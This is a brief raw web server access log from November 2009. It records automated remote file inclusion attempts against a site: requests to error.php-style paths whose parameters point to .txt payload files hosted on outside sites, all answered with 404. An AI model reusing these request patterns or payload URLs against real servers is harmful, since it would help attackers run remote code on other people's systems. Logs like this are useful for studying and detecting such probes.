190.97.219.4 - - [23/Nov/2009:03:44:32 -0800] "GET /logs/access.log//error.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [23/Nov/2009:03:44:50 -0800] "GET /logs/access_090504.log/error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:45:00 -0800] "GET /components/errors.php?error=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:45:01 -0800] "GET /logs/access.log/error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [23/Nov/2009:03:45:01 -0800] "GET /error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [23/Nov/2009:03:45:01 -0800] "GET /logs/error.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:03:45:01 -0800] "GET /logs/access_090622.log%20%20//components/errors.php?error=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
